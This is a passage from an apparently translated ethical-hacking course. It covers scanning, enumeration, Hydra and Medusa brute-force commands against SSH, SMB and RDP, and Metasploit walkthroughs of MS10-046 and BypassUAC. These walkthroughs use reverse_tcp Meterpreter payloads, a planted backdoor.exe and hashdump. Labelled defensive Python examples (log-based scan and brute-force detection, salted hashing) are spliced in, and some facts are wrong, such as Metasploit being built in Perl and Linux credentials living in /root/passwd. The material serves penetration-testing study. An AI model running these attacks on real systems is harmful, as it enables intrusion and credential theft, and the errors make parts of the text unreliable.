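    lines += [line(timedelta(minutes=5 * i), "192.168.10.9", 100 + i) for i in range(30)]
    return lines


if __name__ == "__main__":
    for (src, dst), count in detect_port_scans(constructed_log()).items():
        print(f"possible port scan: {src} -> {dst}, {count} distinct ports within 60s")
```

The slow third source shows the limit of a fixed window: a scanner that spreads probes over hours needs a longer window or a count of distinct ports per day to be noticed.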
3. Operating-system identification

Many powerful tools and many port-scanning techniques are available for finding the open ports on a target system. Looking back, our first objective was port scanning, to identify the open TCP and UDP ports on the server. With that information we can tell which ports are listening and whether they have weaknesses. But we need more information about the target, namely its operating system.
a) Active OS Detection

The more detailed the operating-system information, the more useful it is when analyzing weaknesses. We can use the banner-grabbing technique, which tries to obtain information from the FTP, telnet, SMTP and HTTP services. This is the simplest way to detect the operating system and the version it is running. The more accurate technique is stack fingerprinting. It is a very powerful technique that lets us identify the target's operating system with high confidence. Stack fingerprinting requires that the target have at least one listening port; Nmap can still guess when no port is open.

Active OS detection sends packets to the target to identify detailed characteristics of its network stack, which lets us guess the operating system. Because such packets must be sent, it is very easy to detect, so this is not the method a hacker would apply when attacking. Nmap with -O identifies the operating system.

b) Passive OS Detection

Uses passive stack fingerprinting. It is similar in concept to active stack fingerprinting, but instead of sending packets to the target, which is easily detected, the attacker silently monitors network traffic to determine the operating system in use. So by monitoring traffic between different systems we can identify the operating system. This technique depends on having a central position on the network and a port that allows packet capture.

Chapter 4: ENUMERATION

I. What is Enumeration?

Enumeration is the next step in gathering information about an organization. It takes place after scanning and is the process of collecting and analyzing user names, machine names, shared resources and services. It also actively queries or connects to the target to obtain more meaningful information. Enumeration can be defined as the process of extracting the information gathered during scanning into an ordered system. The extracted information includes everything related to the attack target, such as user names, host names, services and shares. Enumeration techniques are driven from the internal environment. Enumeration includes connecting to the system and directly extracting the information. The purpose of enumeration is to identify user accounts and system accounts that can be used to hack a target. It is not necessary to find an administrator account, because we can elevate an account to a level with the rights to grant access to more accounts than were granted before.

II. Banner Grabbing

The most basic enumeration technique is banner grabbing, which can simply be defined as connecting to a remote application and observing the output. It gives a remote attacker a lot of information. At the very least we can identify the service model that is running, which in many cases is what sets up the process of researching weaknesses. Countermeasure: turn off unnecessary services. We can restrict access to services through network access controls.

III. Enumerating network services

1. HTTP fingerprinting
a) Telnet

TELNET (short for TerminaL NETwork) is a network protocol used over Internet connections or over local area network (LAN) connections. The IETF document STD 8 (also known as RFC 854 and RFC 855) states that the purpose of the TELNET protocol is to provide a general, bi-directional, eight-bit byte oriented communications facility. TELNET is a client-server protocol built on TCP; the client (the user) usually connects to port 23 on a server, which provides the application program that carries out the services.

Use telnet to learn information from an open service port; it is a tool for remotely retrieving information through the telnet port, which most operating systems support.

C:\>telnet www.google.com 80

b) Netcat

A tool that lets you write and read data over TCP and UDP. Netcat can be used as a port scanner, backdoor, port redirector, port listener, and more.
Using netcat from the command line:
- Connect mode: nc [-options] hostname port1[-port2]

- Listen mode: nc -l -p port [-options] [hostname] [port]
Example, grabbing a server's banner on port 80:

nc -n 192.168.10.102 80

Port scanning: run netcat with the -z option. Example, scanning TCP ports 1 to 500 of host 192.168.10.102:

nc -v -z 192.168.10.102 1-500

nc -v www.google.com 80
www.google.com [74.215.71.105] 80 (http) open

c) OpenSSL

OpenSSL is a collaborative effort to develop a full-featured open-source toolkit implementing the SSL (version 2 and version 3) and TLS (version 1) protocols, managed by a worldwide community of volunteers who use the Internet to communicate and develop the OpenSSL toolkit and its related documentation. Most software, such as IMAP & POP, Samba, OpenLDAP, FTP, Apache and others, requires user authentication before allowing use of the service. By default, however, the user name and password are transmitted in plain text, so they can be read or altered by someone else. Encryption techniques such as SSL ensure the safety and integrity of the data: with this technique, information sent across the network is encrypted point to point. Once OpenSSL is installed on a Linux server we can use it as a third-party tool that lets other applications use SSL features.

OpenSSL is a cryptographic toolkit implementing the SSL and TLS network protocols and the related cryptographic standards. The openssl program is a command-line tool for using the cryptographic functions of OpenSSL's crypto library from the shell. OpenSSL provides libraries with cryptographic functions for applications such as secure web servers. It is open-source software that can be used for both commercial and non-commercial purposes, with strong encryption available worldwide; it supports the SSLv2, SSLv3 and TLSv1 protocols, both RSA and Diffie-Hellman ciphers, DSO, support for OpenSSL and RSAref (US), improved passphrase handling for private keys, X.509 certificate based authentication for both client and server, support for X.509 certificate revocation lists, and the ability to re-tune the SSL handshake parameters per URL.
2. DNS Enumeration

DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers, which can yield information such as user names, computer names and IP addresses of potential target systems. There are many tools that can be used to obtain information for DNS enumeration. Examples of tools that can be used for DNS enumeration are nslookup, DIG, the American Registry for Internet Numbers (ARIN), and Whois. To perform DNS enumeration we must understand DNS and how it works, and we must know the DNS record types. The list of DNS records gives an overview of the resource record types (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database of information associated with Internet domain names and addresses. In these domain servers, different record types are used for different purposes. The following list describes the common DNS record types and their uses:

A (address): maps a host name to an IP address
SOA (Start of Authority): identifies the DNS server responsible for the domain's information
CNAME (canonical name): provides additional names or aliases for an address record
MX (mail exchange): identifies the mail servers for the domain
SRV (service): identifies services such as directory services
PTR (pointer): maps an IP address to a host name
NS (name server): identifies other name servers for the domain

DNS zone transfer is usually used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server performs a specific zone-transfer request to a name server. If the name server allows the zone transfer to occur, all the DNS names and IP addresses hosted by that name server are returned in human-readable ASCII text.

Nslookup

We can also use the command directly as follows:

nslookup -type=any tuoitre.vn

type is the record type, as listed above: NS (name server), MX (mail exchange), any (all records). tuoitre.vn: a domain.

3. NetBIOS name

NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network. Strictly an API, NetBIOS is not a networking protocol. Older operating systems ran NetBIOS over IEEE 802.2 and IPX/SPX using the NetBIOS Frames (NBF) and NetBIOS over IPX/SPX (NBX) protocols, respectively. In modern networks, NetBIOS normally runs over TCP/IP via the NetBIOS over TCP/IP (NBT) protocol. This results in each computer in the network having both a NetBIOS name and an IP address corresponding to a (possibly different) host name. A NetBIOS name is the naming mechanism for the resources in a system using a flat namespace (there is no concept of hierarchy).

Chapter 5: PASSWORD CRACKING

I. Introduction

Password cracking is the process of finding or recovering passwords, for a variety of purposes.

The purpose of password cracking is to let a user recover a forgotten password, or to gain unauthorized access to a system.

II. Password Cracking Techniques

1. Dictionary Attacks/Hybrid Attacks

A dictionary attack uses an existing word list whose entries are hashed and compared with the password hash; when the hashes match, the plain-text form of the password has been found. We can extend or permute the words in the dictionary (hybrid attacks). This approach works well when the password is made of ordinary words, it is fast, and its success rate depends on the dictionary.

2. Brute Forcing Attacks

A brute-force attack tries every combination of all characters, hashing each one and comparing it. Success is guaranteed given enough time, but cracking takes a very long time when the password is long and complex. It is only good for short passwords.
3. Syllable Attacks/Pre-Computed Hashes

Combines the two methods above by generating the hashes of all character combinations in advance, so that only the comparison remains to be done during the cracking process. Cracking takes only a few minutes if the hash tables are already available.

III. Common Attack Types
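The three techniques above all depend on the same property of the stored hash: how much work one candidate password costs, and whether that work can be done once and reused. The following is an added example, not from the original document, that makes the point concrete: a pre-computed table answers an unsalted MD5 lookup in one dictionary access, while a random per-user salt plus an iterated KDF (PBKDF2-HMAC-SHA256 here; the word list, iteration count and sample passwords are constructed assumptions) forces the work to be repeated for every record and every candidate.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # work factor (assumed value); raise it on faster hardware
WORDLIST = ["password", "12345", "letmein", "qwerty"]  # constructed toy dictionary


def build_lookup_table(wordlist, algo="md5"):
    """Pre-computed table hash -> plaintext for a fast, unsalted hash.
    Built once, it answers every future lookup with a single dictionary access."""
    return {hashlib.new(algo, word.encode()).hexdigest(): word for word in wordlist}


def crack_unsalted(stored_hash, table):
    """Dictionary / pre-computed attack against an unsalted hash: one lookup."""
    return table.get(stored_hash)


def hash_password(password, salt=None):
    """Defender side: PBKDF2-HMAC-SHA256 with a random 16-byte per-user salt.
    Two users with the same password get different records."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${ITERATIONS}${digest.hex()}"


def verify_password(password, stored):
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def crack_salted(stored, wordlist):
    """Against a salted, iterated hash the table is useless: every candidate must be
    re-hashed with this record's own salt and iteration count.
    Returns (plaintext or None, number of KDF evaluations spent)."""
    salt_hex, iterations, digest_hex = stored.split("$")
    salt, n = bytes.fromhex(salt_hex), int(iterations)
    for attempts, word in enumerate(wordlist, start=1):
        candidate = hashlib.pbkdf2_hmac("sha256", word.encode(), salt, n).hex()
        if hmac.compare_digest(candidate, digest_hex):
            return word, attempts
    return None, len(wordlist)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted md5 of '12345' ->", crack_unsalted(hashlib.md5(b"12345").hexdigest(), table))
    record = hash_password("12345")
    print("salted record:", record)
    print("salted crack needed", crack_salted(record, WORDLIST)[1], "KDF evaluations")
```

The cost difference is the whole argument for salting and slow hashing: the unsalted table is amortized over every hash ever captured, whereas each salted record costs the attacker the full word list times the iteration count, and the table cannot be shared between records.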

1. Active Password Cracking

Find a usable user name and then guess the password for that user name. The process can be automated to speed up the search. Forms of active password cracking:

o Password guessing: take a dictionary of words and attack the password by trying every combination. This type of attack needs a lot of time and network bandwidth and is easily detected.
o Trojan/Spyware/Keylogger: programs running in the background that let the attacker record every key pressed (keylogger), or secretly collect information about individuals and organizations (spyware); with the help of a Trojan, the attacker can gain access to stored passwords, read private documents and delete files.
2. Passive Password Cracking

Capture the login process on the wire and break the password offline (sniffing, MITM). These attacks include:

o Wire sniffing: the attacker runs packet-sniffing tools on the LAN to access and record live network traffic. The captured data may include passwords sent to remote systems in Telnet, FTP and rlogin sessions and in e-mail sent and received.
o Man-in-the-Middle (MITM) and replay attack: in a MITM attack, the attacker gains access to the communication channel between the victim and the server to look for information; in a replay attack, packets and authentication tokens are captured using a sniffer and sent again.
3. Offline Password Cracking

Gain direct access to the victim's computer and copy the files that store the credentials, for example the SAM database on Windows (%systemroot%/system32/config) or /root/passwd on Linux. John can then be used to find the plain-text password.

IV. Password Cracking Tools

1. Hydra
a) Introduction

Hydra is a very fast network logon cracker that supports many different protocols and services. Hydra is a parallelized login cracker, meaning it runs many tasks at the same time so that cracking finishes faster. The tool lets researchers and security consultants demonstrate how easy it would be to gain unauthorized remote access to a system.

b) Usage

The general syntax of Hydra is:

hydra [[[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]] | [-C FILE]] [-t TASKS] [-w WAIT] [server | IP] [service://server[:port]]

Example:

hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1

Where:
-f: finish: stop as soon as the first valid user name/password pair is found
-L: file of user names (-l for a single user name)
-P: file of passwords (-p for a single password)
192.168.10.1: the IP address whose login password is to be cracked
http-get: the HTTP service on port 80 (http is replaced by http-get or http-head)
http://192.168.10.1: the web page used for the cracking process

2. Medusa
a) Introduction

Medusa can be used to brute-force logins, module by module, in parallel and quickly. Its goal is to support as many services that allow remote authentication as possible. Medusa is designed around the following characteristics:

Thread-based parallel testing: it can test multiple hosts, user names and passwords at once.
Modular design: each service exists as an independent (.mod) file. The core does not need to be modified to extend the list of services supported for brute-forcing.

b) Usage

Syntax:

medusa [-h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] -M module [OPT]

-h host name or IP address, -H file containing hosts
-u user name, -U file containing user names
-p password, -P file containing passwords
-C combination file of host, user name and password in the form host:username:password
-M module is mandatory and is followed by the name of a supported module. To list all modules, type:

medusa -d

and for detailed usage of one module:

medusa -M module_name -q

V. Password Cracking on Protocols

1. HTTP (HyperText Transfer Protocol)

a) Concept

This is the hypertext transfer protocol, commonly used for web applications (World Wide Web, WWW) on the default port 80.
b) Two forms of HTTP authentication:

Basic access authentication: a method for a web browser or other program to supply a user name and password when they are requested. It is supported by all web browsers, but because the user name and password are sent in plain text it is rarely applied in practice. Logging in to a router is a typical example.

We can use Wireshark to capture it:

As the capture shows, the user name and password obtained are admin:12345.

Digest access authentication: one of the agreed methods a web server can use to negotiate credentials with the user's web browser. It applies a hash function to the sensitive information before sending it over the network.
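Two things the capture above illustrates are worth seeing in code: a Basic credential is only base64, so anyone who reads the header recovers the password, while a Digest response is an MD5 of the credential combined with a server nonce, so the password itself never crosses the wire and the server can store HA1 instead of the password. The following is an added example, not from the original document; the Digest computation is the RFC 2617 form without the qop extension (a simplification), the realm and nonce are constructed, and the admin:12345 credential is the one shown in the capture.

```python
import base64
import hashlib
import secrets


def parse_basic_authorization(header_value):
    """'Authorization: Basic <base64(user:password)>' carries the password in the clear:
    base64 is an encoding, not encryption, so a packet capture reveals it."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def _md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_ha1(username, realm, password):
    """HA1 = MD5(username:realm:password): what the server keeps instead of the password."""
    return _md5_hex(f"{username}:{realm}:{password}")


def digest_response(ha1, method, uri, nonce):
    """Client-side RFC 2617 Digest response (no qop): MD5(HA1:nonce:HA2)."""
    ha2 = _md5_hex(f"{method}:{uri}")
    return _md5_hex(f"{ha1}:{nonce}:{ha2}")


def digest_verify(stored_ha1, method, uri, nonce, response):
    """Server-side check. The nonce is issued by the server and should be accepted once,
    otherwise a captured response can simply be replayed."""
    expected = digest_response(stored_ha1, method, uri, nonce)
    return secrets.compare_digest(expected, response)


def constructed_basic_header():
    """Credential from the capture shown above (admin:12345); the header is constructed."""
    return "Basic " + base64.b64encode(b"admin:12345").decode("ascii")


if __name__ == "__main__":
    print("Basic decodes to:", parse_basic_authorization(constructed_basic_header()))
    ha1 = digest_ha1("admin", "router", "12345")          # realm "router" is assumed
    nonce = "constructed-nonce-0001"                      # assumed server nonce
    resp = digest_response(ha1, "GET", "/", nonce)
    print("Digest response on the wire:", resp)
    print("server verifies:", digest_verify(ha1, "GET", "/", nonce, resp))
```

Digest keeps the password off the wire, but it is still unsalted MD5 over a low-entropy secret and a visible nonce, so a captured exchange can be attacked offline with the dictionary techniques from section II; TLS, not the authentication scheme, is what protects the exchange.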
c) Cracking HTTP passwords

We can use nmap (Network Mapper) to scan for open ports:

Open the browser to test the authentication process:

When we click Cancel we get the message:

In a Terminal on BackTrack 5, type:

hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1

Where:
-f: finish: stop as soon as the first valid user name/password pair is found
-L: file of user names (-l for a single user name)
-P: file of passwords (-p for a single password)
192.168.10.1: the IP address whose login password is to be cracked
http-get: the HTTP service on port 80 (http is replaced by http-get or http-head)
http://192.168.10.1: the web page used for the cracking process

Or:

medusa -h 192.168.10.1 -U login.txt -P password -M http

Where:
-h: host name or IP address whose login password is to be cracked
-U: file of user names (-u for a single user name)
-P: file of passwords (-p for a single password)
-M http: the protocol to crack; M is short for module

Then return to the web browser and enter the user name and password that were found:

2. SSH (Secure Shell)

a) Concept

SSH is a network protocol for secure data communication, remote shell services or command execution, and other secure network services between networked computers. It connects a server and a client (running the SSH server and SSH client programs) through a secure channel over an insecure network. The best-known application of the protocol is access to shell accounts on Unix-like operating systems (Linux). It was created to replace insecure protocols such as telnet, rsh and rexec, in which the password is sent in plain text and can easily be read. SSH operates on TCP port 22.
b) Cracking passwords over SSH

Check whether the ssh service is running:

With hydra:

hydra -f -L login.txt -P password.txt 192.168.10.101 ssh

With Medusa:

medusa -h 192.168.10.101 -U login.txt -P password.txt -M ssh

And this is how to access a Nokia N900 device remotely with the user name and password just found:

Example of checking the network interfaces remotely:
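On the server side, the Hydra and Medusa runs above look the same in the OpenSSH log: a burst of "Failed password" lines from one address, cycling through user names, sometimes followed by an "Accepted password" line from the same address. The following is an added example, not from the original document or from OpenSSH, that pulls that pattern out of auth.log lines; the sample lines, the window of 60 seconds and the threshold of 10 failures are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH auth.log lines carry a syslog prefix without a year; all lines here are constructed.
_PREFIX = r"^(?P<ts>\w{3} +\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
FAILED_RE = re.compile(_PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) "
                       r"from (?P<src>\S+) port \d+")
ACCEPT_RE = re.compile(_PREFIX + r"Accepted (?:password|publickey) for (?P<user>\S+) "
                       r"from (?P<src>\S+) port \d+")


def _parse_ts(text):
    # syslog omits the year; strptime defaults it to 1900, which is fine for differences
    return datetime.strptime(" ".join(text.split()), "%b %d %H:%M:%S")


def analyze_sshd_log(lines, window=timedelta(seconds=60), threshold=10):
    """Per source address that reaches `threshold` failures inside one window:
    the peak failure count, how many user names were tried, and any account that
    was accepted from the same source after the failures began."""
    failures = defaultdict(list)
    accepted = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            failures[m.group("src")].append((_parse_ts(m.group("ts")), m.group("user")))
            continue
        m = ACCEPT_RE.match(line)
        if m:
            accepted.append((_parse_ts(m.group("ts")), m.group("src"), m.group("user")))

    report = {}
    for src, evs in failures.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            first_failure = evs[0][0]
            logins = sorted({u for ts, s, u in accepted if s == src and ts >= first_failure})
            report[src] = {
                "max_failures_in_window": best,
                "distinct_users": len({u for _, u in evs}),
                "logins_after_burst": logins,
            }
    return report


def constructed_auth_log():
    """Constructed sample: a 24-attempt burst from one address that ends in a
    successful login, plus one ordinary mistyped password from another host."""
    base = datetime(2012, 10, 1, 10, 0, 0)

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).strftime("%b %d %H:%M:%S")

    users = ["root", "admin", "user"]
    lines = [
        f"{stamp(2 * i)} host1 sshd[{4000 + i}]: Failed password for "
        f"{'invalid user ' if users[i % 3] == 'admin' else ''}{users[i % 3]} "
        f"from 192.168.10.66 port {40000 + i} ssh2"
        for i in range(24)
    ]
    lines.append(f"{stamp(50)} host1 sshd[4100]: Accepted password for user from 192.168.10.66 port 40100 ssh2")
    lines.append(f"{stamp(3)} host1 sshd[4200]: Failed password for user from 192.168.10.7 port 50000 ssh2")
    lines.append(f"{stamp(9)} host1 sshd[4201]: Accepted password for user from 192.168.10.7 port 50000 ssh2")
    return lines


if __name__ == "__main__":
    for src, info in analyze_sshd_log(constructed_auth_log()).items():
        print(src, info)
```

The "logins_after_burst" field is the one to act on first: a success that follows a burst means the guessing worked, which is a different incident from a burst that was merely noisy. Key-only authentication and a rate limiter such as fail2ban remove most of this traffic before it reaches the log.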

3. SMB (Server Message Block)

a) Concept

SMB, also known as Common Internet File System (CIFS), operates at the application layer of the OSI model and is usually used to provide shared access to files, printers and various other communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most uses of SMB involve Microsoft Windows. SMB can run on top of the session layer or lower:

o directly over TCP port 445;
o via NetBIOS (which provides services related to the session layer of the OSI model, letting applications on separate computers communicate over a LAN) on UDP ports 137 and 138 and TCP ports 137 and 139.
b) Cracking SMB passwords

Scan to see whether any machine is running the smb service on port 445:

With Hydra we type:

hydra -f -L login.txt -P password.txt 192.168.10.100 smb

With Medusa we type:

medusa -h 192.168.10.100 -U login.txt -P password.txt -M smbnt

And this is how we use the user name and password just found:

4. RDP (Remote Desktop Protocol)

a) Concept

RDP is a proprietary protocol developed by Microsoft that provides a user with a graphical interface to another computer. Microsoft currently refers to its RDP server software as Remote Desktop Services, formerly Terminal Services, and to the client software as Terminal Services Client. When connecting to a remote computer we are asked for a matching user name and password, so cracking the RDP password is necessary if we want access without the user's consent. RDP operates on TCP port 3389.
b) Cracking RDP passwords

Scan to see whether any computer has port 3389 open:

With Hydra:

hydra -f -L login.txt -P password.txt 192.168.10.100 rdp -t 4 -w 1

Medusa does not support the RDP protocol directly. However, we can use the wrapper module with rdesktop as the script. We proceed as follows:

medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -h 192.168.10.100 -U login.txt -P password.txt

However, the program still does not work quite correctly and takes a lot of time, and the attacker has to enter each password one at a time. This is how to use rdesktop to control the remote computer with the user name and password found:

Chapter 6: SYSTEM HACKING

I. INTRODUCTION TO METASPLOIT

1. Introduction

Metasploit is a computer security project that provides information about security vulnerabilities and aids penetration testing and the development of intrusion detection systems. A very well-known sub-project of Metasploit is the Metasploit Framework, an environment for testing, attacking and exploiting flaws in services. Metasploit was built with the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows, MacOS. We can download the program at www.metasploit.com. The current Metasploit version is 4.4.
2. Metasploit components

Metasploit supports several user interfaces:

Console interface: the msfconsole command. The msfconsole interface uses command lines to configure and test, so it is faster and more flexible.
Web interface: msfweb, which interacts with the user through a web interface.
Command line interface: msfcli.

Environment:

Global environment: set through the two commands setg and unsetg; options set here are global and are applied to all exploit modules.
Temporary environment: set through the two commands set and unset; this environment applies only to the exploit module currently loaded and does not affect other exploit modules.

We can save the environment we have configured with the save command. The environment is stored in ./msf/config and is loaded again when the user interface is started.
3. Using the Metasploit Framework

a) Choose an exploit module

Choose a flawed program or service that Metasploit supports exploiting:

show exploits: list the exploit modules the framework supports
use exploit_name: select an exploit module
info exploit_name: view information about the exploit module

We should regularly update the service flaws and modules from www.metasploit.com, or with the command msfupdate or svn update /opt/metasploit/msf3/
b) Configure the chosen exploit module

show options: determine which options need to be configured
set: configure the module's options

Some modules have advanced options, which we can view with the command show advanced
c) Verify the configured options

check: check whether the options have been set correctly.


d) Choose the target

Choose which operating system to run against:

show targets: the targets provided by the module
set: specify the target

e.g.: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Choose the payload

A payload is the code that will run on the remote system; it is the part of a computer virus that executes the malicious code.

show payloads: list the payloads available for the current exploit module
info payload_name: view detailed information about the payload
set payload payload_name: specify the payload module name. After choosing a payload, use show options to view the payload's options
show advanced: view the payload's advanced options
f) Run the exploit

exploit: the command that runs the payload code. The payload then gives us information about the exploited system.
4. Introduction to the Meterpreter payload

Meterpreter, short for Meta-Interpreter, is an advanced payload included in the Metasploit Framework. Its purpose is to provide sets of commands for exploiting and attacking remote computers. It is written by its developers as shared object (DLL) files. Meterpreter and its extension components execute in memory and are never written to disk, so they can avoid detection by antivirus software. Meterpreter provides sets of commands that we can use against remote computers:

Fs (Filesystem): provides interaction with the file system
Net: lets us view the remote machine's network information such as IP address and routing table
Process: lets us create and interact with processes on the remote machine
Sys: lets us view the remote machine's system information and environment
a) Using the Fs module

cd directory: like the command-line cd, changes the working directory
getcwd: shows the current working directory
ls: lists directories and files
upload src1 [src2 ...] dst: uploads files from src to dst
download src1 [src2 ...] dst: downloads files from src to dst
b) Using the Net module

ipconfig: view the configuration of the remote computer's network interfaces
route: view the remote machine's routing table
c) Using the Process module

execute -f file [ -a args ] [ -Hc ]: the execute command creates a new process on the remote machine and uses that process to extract data
kill pid1 pid2 pid3: terminate processes running on the remote machine
ps: list the remote machine's processes
d) Using the Sys module

getuid: shows the current user name on the remote machine
sysinfo: shows information about the victim machine: operating system, version, and whether the platform is 32-bit or 64-bit

5. Countermeasures

Regularly install Microsoft's patches. For example, so that Metasploit cannot exploit the Lsass_ms04_011 flaw, we must install Microsoft's patch. Microsoft rates it a critical flaw, present on almost all Windows operating systems. We should use the hotfix numbered 835732 for this flaw.

II. The MS10-046 (2286198) vulnerability

1. Introduction

This is a very serious flaw related to the Windows Shell on all affected operating systems; it allows an attacker to take complete control of Windows and execute code remotely. The flaw was discovered in June 2010, and in August 2010 Microsoft released a patch. This dangerous flaw lies in Windows shortcut files (*.lnk), which are usually found on the desktop or in the Start menu. By creating a shortcut file with embedded malicious code, a hacker can have the code executed automatically when the user views the shortcut or the contents of a folder containing the malicious shortcut. The affected Windows versions are:

Affected operating systems:
- Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows Vista Service Pack 1 and Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems*
- Windows Server 2008 R2 for Itanium-based Systems

2. Attack steps:

After booting BackTrack and logging in successfully, we open a Terminal:

Type msfconsole and press Enter:

To open the ms10-046 flaw, type search ms10-046 and press Enter.

Then type use exploit/windows/browser/ms10_046_shortcut_icon_dllloader and press Enter.

Use the command show options to view the parameters needed to carry out the attack:
o SRVHOST: the attacker's machine address, which listens for victims connecting to it
o SRVPORT: the listening port, by default http (80)

We then run:
o set PAYLOAD windows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set the lhost IP address: set LHOST 192.168.1.200. LHOST is a parameter of the PAYLOAD we just set above.

exploit starts the listening server on the attacking machine.

On the victim machine, create a shortcut by right-clicking the Desktop -> New -> Shortcut.

Type the attacking machine's address into "Type the location of the item": http://192.168.1.200/anything, and click Next.

Name the newly created shortcut and click Finish. We then open this shortcut:

After a moment, on the attacking machine we get:

Use the sessions command to view the sessions Metasploit currently has:

To interact with a session we run: sessions -i 1 (1 is the session id)

And now everything becomes easier, as the attacker has full control of the victim machine. For example, the sysinfo command gets information about the victim machine, and the hashdump command gets the users' passwords in hash form.

A very useful command for using cmd (the command line): shell

3. Countermeasures

Regularly install Windows patches to avoid being exploited by hackers.

The patch with code name KB2286198 contains a new version of the file Shell32.dll and is an important update. Shell32.dll is a very important library file in Windows; it contains a number of Windows Shell API functions. If Shell32.dll is faulty or incorrectly updated, the computer will experience the "Blue Screen of Death".

III. The BYPASSUAC vulnerability

1. Introduction

From Windows Vista onward, Microsoft introduced a built-in utility called User Access Control (UAC). UAC increases the security of Windows by limiting application software to standard user privileges. Thus only software the user trusts receives administrative privileges; other software does not. However, even under an administrator account, applications are limited just like other ordinary accounts. The operating systems that have User Access Control built in are all affected and can be exploited.
2. Attack steps

Open a Terminal, type msfconsole and press Enter:

use exploit/multi/handler. This is a module that provides many functions of Metasploit's payload system for us to exploit, by running, as in this example, run post/windows/escalate/bypassuac, among many other things.
set PAYLOAD windows/meterpreter/reverse_tcp: lets the victim connect back to the attacking machine for easy control.
set LHOST 192.168.1.202: the listening host, the IP address of the attacking machine
set LPORT 6789: the listening port; any port not yet in use.

exploit starts the server.

81

We create a backdoor that connects to the server we started earlier.

After creating it, we copy the file backdoor.exe to the victim machine and execute it. We can use Samba to share files between Windows and Linux. On the Windows machine we share the file with full access:

Back on the victim machine, execute the backdoor.exe just copied. Then on the attacking side we receive the following:

We have a session, but it does not yet have full control. To get it we run the command: run post/windows/escalate/bypassuac

We can view all supported commands with the command: help

3. Countermeasures

Unfortunately, as of now Microsoft has neither confirmed the flaw in UAC nor provided a patch for this vulnerability. A Microsoft spokesperson asserted that there is no vulnerability in UAC at all. Therefore we need to install reputable antivirus and anti-backdoor software to avoid being exploited.

85

Chapter 7: WEB HACKING WITH DVWA

I. Introduction

For those of us who are new to hacking research, a test environment is very important, but finding a realistic environment suited to our level is not simple. Conversely, those who already have hacking experience surely also want to test how far their skills go and to improve them further. DVWA (Damn Vulnerable Web Application) can meet the needs of both newcomers and people with some experience. DVWA is a framework built with ready-made security holes following the OWASP top 10 web security weaknesses. Its levels, from low to high, can satisfy the needs of many people. So DVWA is a vulnerable PHP/MySQL web application. Its main goal is to help security professionals test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to support teachers and students in teaching and learning web application security in a classroom environment.

II. Installing DVWA on BackTrack

Since this is a PHP framework, the simplest approach is to set up a web server with XAMPP first and then copy DVWA into it; we then use DVWA through the web interface.
1. Download and install XAMPP

Since it is open-source software, go to the XAMPP home page http://www.apachefriends.org/en/xampp.html and download the latest version.

After downloading XAMPP, open a Terminal and type the command shown in the picture below.

Start XAMPP.

Finally, open a web browser and type http://localhost; we get XAMPP's main page, as shown below:

2. Download and install DVWA

Go to http://www.dvwa.co.uk/ to download DVWA.

Then extract the downloaded file and place it in the directory /opt/lampp/htdocs/

Open the web browser and type http://localhost/dvwa/ to get DVWA's main page:

Note: XAMPP must be started before DVWA can run. At the DVWA login page, log in with the default account and password admin/password. Preparation before attacking: open a web browser and type localhost/dvwa. The form ip_address/dvwa can also be used.

90

To exploit the flaws on DVWA (XSS, SQL Injection) we must set the Security Level to Low. At that level, the code we add is kept exactly as entered. At the High level, the htmlspecialchars() function converts special characters, so the input no longer matches what was originally entered. At the Medium level the string <script> is removed, so it has no effect; however, other HTML tags still work normally. Therefore we set the Security Level to low: choose DVWA Security -> Low -> Submit

91

III. Attack techniques on DVWA

1. XSS (Cross-Site Scripting)

a) Introduction

